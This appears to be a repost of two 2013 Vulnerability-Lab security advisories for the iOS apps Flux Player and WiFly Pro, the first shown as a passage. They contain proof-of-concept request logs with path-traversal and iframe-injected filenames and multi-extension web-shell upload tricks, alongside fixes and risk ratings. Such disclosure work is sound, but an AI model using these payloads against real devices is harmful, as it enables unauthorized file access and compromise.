Affected Module(s):
				[+] Index File Dir Listing



1.2
An arbitrary file upload web vulnerability is detected in the Flux Player 3.1.0 Application (Apple iOS - iPad & iPhone).
The arbitrary file upload issue allows a remote attacker to upload files with multiple extensions to bypass the validation for unauthorized access.

The vulnerability is located in the upload module when processing to upload files with multiple ending extensions. Attackers are able to upload 
a php or js web-shells by renaming the file with multiple extensions. He uploads for example a web-shell with the following name and 
extension picture.jpg.js.php.jpg . He deletes in the request after the upload the jpg to access unauthorized the malicious file (web-shell) to 
compromise the web-server or mobile device.

Exploitation of the vulnerability requires no user interaction or privilege flux player application user account. Successful exploitation of the 
vulnerability results in unauthorized file access because of a compromise after the upload of web-shells.

Vulnerable Module(s):
				[+] Upload (Files)

Vulnerable Parameter(s):
				[+] filename (multiple extensions)

Affected Module(s):
				[+] Index File Dir Listing


Proof of Concept:
=================
The local file include and arbitary file upload vulnerability can be exploited by remote attackers without privilege application 
user account and also without user interaction. For demonstration or reproduce ...


1.1
--- Request Session Log 1 - Local File Include ---

Status: 200[OK]

POST http://localhost:8080/ 
Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Content Size[1053] Mime 

Type[application/x-unknown-content-type]
   Request Headers:
      Host[localhost:8080]
      
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0]
      
Accept
     
Accept-Language[en-US,en;q=0.5]
      Accept-Encoding[gzip, deflate]
     DNT[1]
      
Referer[http://localhost:8080/]
      Connection[keep-alive]
   
Post Data:
      POST_DATA[-----------------------------21961286324572
Content-Disposition: form-data; name="file"; filename=<iframe src=a>"<iframe src=var/app/Mobile>"
Content-Type: image/png
-
--
Status: 200[OK]

GET http://localhost:8080/../var/app/Mobile > [Included File/Path as Filename!]
Load Flags[LOAD_DOCUMENT_URI  ] Content Size[669] Mime Type[application/x-unknown-

content-type]
   Request Headers:
      Host[localhost:8080]
      
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0]
      
Accept 
      
Accept-Language[en-US,en;q=0.5]
      Accept-Encoding[gzip, deflate]
      DNT[1]
      
Referer[http://localhost:8080/]
      Connection[keep-alive]
   
Response Headers:
      Accept-Ranges[bytes]
      Content-Length[669]
      Date[Mo., 15 Jul 2013 20:05:02 GMT]



1.2
--- Request Session Log 2 - Arbitrary File Upload ---

Status: 200[OK]

POST http://localhost:8080/ 
Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Content Size[1053] Mime 

Type[application/x-unknown-content-type]
   Request Headers:
      Host[localhost:8080]
      
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0]
      
Accept
     
Accept-Language[en-US,en;q=0.5]
      Accept-Encoding[gzip, deflate]
     DNT[1]
      
Referer[http://localhost:8080/]
      Connection[keep-alive]
   
Post Data:
      POST_DATA[-----------------------------21961286324572
Content-Disposition: form-data; name="file"; filename="schoko-drops-337.gif.html.php.js.jpg"
Content-Type: image/png
---
Status: 200[OK]

GET http://localhost:8080/schoko-drops-337.gif.html.php.js.jpg > [Included File/Path as Filename!]
Load Flags[LOAD_DOCUMENT_URI  ] Content Size[669] Mime Type[application/x-unknown-

content-type]
   Request Headers:
      Host[localhost:8080]
      
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0]
      
Accept 
      
Accept-Language[en-US,en;q=0.5]
      Accept-Encoding[gzip, deflate]
      DNT[1]
      
Referer[http://localhost:8080/]
      Connection[keep-alive]
   
Response Headers:
      Accept-Ranges[bytes]
      Content-Length[669]
      Date[Mo., 15 Jul 2013 20:05:05 GMT]




Note: 
After the upload of the manipulated malicious file (shell or web-shell), the remote attacker is able to access the 
full files by a delete of the image file extension. Its also possible to upload a file with multiple file extensions 
and to access with another frame.



PoC:

<html><head><title>Download</title><style>html {background-color:#eeeeee} body 
{ background-color:#FFFFFF; font-family:Tahoma,Arial,Helvetica,sans-serif; font-

size:18x; margin-left:15%; margin-right:15%; border:3px groove #006600; padding:15px; } </style></head>
<body><h1>Files from </h1><bq>The following files are hosted 

live from the <strong>iPhone's</strong> Docs folder.</bq><p><a href="..">..</a><br>
<a href=".DownloadStatus">.DownloadStatus</a>		(     0.0 Kb, (null))<br>
<a href=".mpdrm">.mpdrm</a>		(     0.0 Kb, (null))<br>
<a href="<iframe src=a>">_<[File Include/Arbitrary File Upload Vulnerability!]"></a>(0.0 Kb, (null))<br />
<a href=">">BKM337></a>		(     0.0 Kb, (null))<br />
<a href="Rem0ve>">Rem0ve></a>		(     0.0 Kb, (null))<br />
<a href="a2b642e7de.jpg">a2b642e7de.jpg</a>		(     0.0 Kb, (null))<br />
</p><form action="" method="post" enctype="multipart/form-data" name="form1" id="form1"><label>upload file
<input type="file" name="file" id="file" /></label><label><input type="submit" name="button" id="button" 
value="Submit" /></label></form></body></html></iframe></a></p></body></html>

Note: 
To exploit the issue the attacker needs to bypass the validation by an inject of 2 different scripts (tags).
After the upload the local file or path gets executed when processing to open the item listing.


Solution:
=========
1.1
The vulnerability can be patched by a secure parse of the filenames when processing to upload via POST method request.
Encode and parse the filename output listing in the index site of the application. Restrict the filename name input and disallow special chars.

1.2
Restrict the input of the filenames when processing to upload a file with multiple extension. 
Encode and parse the filename output listing in the index site of the application. Restrict the filename name input and disallow special chars.
Disallow to open urls with multiple file extensions to prevent execution or access to web-shells.



Risk:
=====
1.1
The security risk of the local file include web vulnerability is estimated as high.

1.2
The security risk of the arbitrary file upload vulnerability is estimated as high(+).


Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com)


Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       - admin@evolution-sec.com
Section:    www.vulnerability-lab.com/dev 	- forum.vulnerability-db.com 		       - magazine.vulnerability-db.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and 
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

				Copyright � 2013 | Vulnerability Laboratory [Evolution Security]



-- 
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com


WiFly 1.0 Pro iOS – Multiple Web Vulnerabilities

WiFly 1.0 Pro iOS – Multiple Web Vulnerabilities genel açıklara ilişkin açık bulucunun yorumları aşağıdaki gibidir.

 


Title: ====== WiFly 1.0 Pro iOS - Multiple Web Vulnerabilities

Date: ===== 2013-07-15

References: =========== <a href="http://www.vulnerability-lab.com/get_content.php?id=1011">http://www.vulnerability-lab.com/get_content.php?id=1011</a>

VL-ID: ===== 1011

Common Vulnerability Scoring System: ==================================== 6.3

Introduction: ============= It is the best solution for transferring photos, songs, documents, movies and other files between computer and your mobile devices over wireless network. Simply launch application on your iOS device and scan QR code from <a href="http://wifly.me">http://wifly.me</a> to connect your phone. Drop your files into opened page and vice versa! No cloud or internet access required - no data leaves your local network. Both your devices must have access to the same LAN or WLAN - no additional network configurations needed. Transferred documents can be opened with any supported App on your iOS device.

Capabilities:
 - Multiple uploads
 - Easily Drag & Drop multiple files to WiFly
 - Preview pictures in the browser - Downloading the entire folder to your computer
 - Browsing files and folders directly on mobile device
 - Exchange files between mobile devices - Built in preview of images, documents, music and video files

(Copy of the Homepage: <a href="https://itunes.apple.com/us/app/wifly-pro/id641092695">https://itunes.apple.com/us/app/wifly-pro/id641092695</a> )

Abstract: ========= The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the WiFly 1.0 Pro application (Apple iOS - iPad & iPhone).

Report-Timeline: ================ 2013-07-15:    Public Disclosure (Vulnerability Laboratory)

Status: ======== Published

Affected Products: ================== Apple AppStore Product: WiFly Pro 1.0

Exploitation-Technique: ======================= Remote

Severity: ========= High

Details: ======== A local file include and arbitrary file upload web vulnerability is detected in the WiFly 1.0 Pro application (Apple iOS - iPad & iPhone).

The vulnerabilities are located in the file upload module of the web-server (<a href="http://localhost:4885/">http://localhost:4885/</a>) when processing to request via POST a manipulated filename. The injected file will be accessable via the index listing module of the application.

Remote attackers can exchange the filename with a double or tripple extension via POST method to bypass the upload validation and filter process. After the upload the attacker access the file with one extension and exchange it with the other one to execute for example php, js, html codes.

The filter in the application itself disallow to rename a file with special chars because of a input field restriction. Attackers need to request 2 different urls. First the file as url with a parameter of the filename inside to display and as secound step the file will be uploaded with the manipulated filename in the POST request.

Exploitation of the vulnerability requires no user interaction but the victim iOS device needs to accept the other device connection. Successful exploitation of the vulnerability results in unauthorized path or file access via local file include or arbitrary file upload.

Vulnerable Application(s):     [+] WiFly Pro 1.0 - ITunes or AppStore (Apple)

Vulnerable Module(s):     [+] Upload

Vulnerable File(s):     [+] upload.json & add

Vulnerable Parameter(s):     [+] filename

Affected Module(s):     [+] Index Listing (<a href="http://localhost:4885/">http://localhost:4885/</a>)

Proof of Concept: ================= The local file/path include and arbitrary file upload vulnerability can be exploited by remote attackers without user interaction but the connection needs to be accepted by the target system. For demonstration or reproduce ...

Standard Request: Content-Disposition: form-data; name="files[]"; filename="s2.png"\r\nContent-Type: image/png\r\n\r\n?PNG\r\n\n

Status: 200 POST <a href="http://192.168.2.104:4885/api/1/upload.json?id_parent=0&size=53025&last_modified=1331091664536000&name=new-image23.png&sessionid=1373658611109">http://192.168.2.104:4885/api/1/upload.json?id_parent=0&size=53025&last_modified=1331091664536000&name=new-image23.png&sessionid=1373658611109</a> Load Flags[LOAD_BYPASS_CACHE  ] Content Size[118] Mime Type[application/x-unknown-content-type]

PoC: 1.1 - File/Path Include Vulnerability POST <a href="http://192.168.2.104:4885/api/1/upload.json?id_parent=0&size=53025">http://192.168.2.104:4885/api/1/upload.json?id_parent=0&size=53025</a>& last_modified=1331091664536000&name=../../[File/Path Include Vulnerability!].png&sessionid=1373658611109 POST_DATA[-----------------------------27213192708057 Content-Disposition: form-data; name="files[]"; filename="../../[File/Path Include Vulnerability!]" Content-Type: image/png

PoC: 1.2 - Arbitrary File Upload Vulnerability POST <a href="http://192.168.2.104:4885/api/1/upload.json?id_parent=0&size=53025">http://192.168.2.104:4885/api/1/upload.json?id_parent=0&size=53025</a>& last_modified=1331091664536000&name=[Arbitrary File Upload Vulnerability!].png.gif.html.php.js&sessionid=1373658611109 POST_DATA[-----------------------------27213192708057 Content-Disposition: form-data; name="files[]"; filename="[Arbitrary File Upload Vulnerability!].png.gif.html.php.js" Content-Type: image/png

Solution: ========= The vulnerability can be patched by a restriction of the json upload request and url parameter. The POST request when processing to upload needs to be restricted, encoded and filtered.

Risk: ===== The security risk of the local file/path include & arbitrary file upload vulnerability is estimated as high.

Credits: ======== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (<a href="mailto:bkm@evolution-sec.com">bkm@evolution-sec.com</a>)

Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    <a href="http://www.vulnerability-lab.com">www.vulnerability-lab.com</a>    - <a href="http://www.vuln-lab.com">www.vuln-lab.com</a>          - <a href="http://www.evolution-sec.com">www.evolution-sec.com</a> Contact:    <a href="mailto:admin@vulnerability-lab.com">admin@vulnerability-lab.com</a>  - <a href="mailto:research@vulnerability-lab.com">research@vulnerability-lab.com</a>         - <a href="mailto:admin@evolution-sec.com">admin@evolution-sec.com</a> Section:    <a href="http://www.vulnerability-lab.com/dev">www.vulnerability-lab.com/dev</a>  - forum.vulnerability-db.com          - magazine.vulnerability-db.com Social:     twitter.com/#!/vuln_lab   - facebook.com/VulnerabilityLab         - youtube.com/user/vulnerability0lab Feeds:     vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (<a href="mailto:admin@vulnerability-lab.com">admin@vulnerability-lab.com</a> or <a href="mailto:research@vulnerability-lab.com">research@vulnerability-lab.com</a>) to get a permission.

Copyright � 2013 | Vulnerability Laboratory [Evolution Security]

&nbsp;

-- VULNERABILITY LABORATORY RESEARCH TEAM DOMAIN: <a href="http://www.vulnerability-lab.com">www.vulnerability-lab.com</a> CONTACT: <a href="mailto:research@vulnerability-lab.com">research@vulnerability-lab.com</a>